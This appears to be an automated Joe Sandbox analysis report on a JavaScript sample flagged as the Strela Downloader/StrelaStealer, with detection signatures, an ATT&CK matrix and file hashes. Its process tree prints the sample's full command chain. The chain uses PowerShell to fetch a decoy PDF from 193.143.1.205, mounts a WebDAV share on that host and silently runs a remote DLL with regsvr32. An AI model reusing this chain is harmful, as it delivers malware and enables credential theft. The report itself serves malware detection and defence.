Windows
Analysis Report
66419266296038088.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7580 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\66419 2662960380 88.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7668 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\110 9219193632 .dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7720 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7916 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 8156 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 1812 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 56 --field -trial-han dle=1624,i ,154385558 3839744230 7,17499794 4095259421 82,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7236 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588568 |
Start date and time: | 2025-01-11 02:28:51 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 66419266296038088.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 172.64.41.3, 162.159.61.3, 2.23.242.162, 2.16.168.105, 2.16.168.107, 23.209.209.135, 2.22.50.144, 2.22.50.131, 23.46.156.53, 23.46.156.40, 192.168.2.9, 172.202.163.200, 23.56.162.204
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
20:29:49 | API Interceptor | |
20:29:53 | API Interceptor | |
20:29:53 | API Interceptor | |
20:30:06 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.49321358871714077 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztai:cJhXC9lHmutpJyiRDeJ/aUKrDgnmU |
MD5: | 0FDEF2C618AE6051FCF6E75D3F430FC4 |
SHA1: | AD79307FAD5D24BD71942425E5FFCC7D62104AF4 |
SHA-256: | C576D7584ABE686EE36CADA38CB6FA1CFF90C5FD153CC548482843650B7B0746 |
SHA-512: | F87F2ABDFABC6FECD7614B27E11421AE3595CB4EC6F5A0A0B678B55C954932EBD5FCA2DEA980B4EE9D38C76FD616B74CD1521768D526561C9481713FC6CD6327 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216901284918041 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:7azaNvFv8V2UW/DLzN/w4wZi |
MD5: | EDDA54F8BC310041A2D3716F745ADFA3 |
SHA1: | E0A455FA299D6C48462C8175863A13815FCAF9F1 |
SHA-256: | 09185E3623655DC159DFDE1D5CF480DDA07FAB1410EE92CC9330A7B51D0FFD07 |
SHA-512: | C7D8A3B15274B6260AF8907CDB51EE0D9FF0A5185103A44998D36C28185F28B7FD6DC764968E5E00555AB4CA385C8A051552746B185CA4FC1AB781793B258D1C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08108793798873956 |
Encrypted: | false |
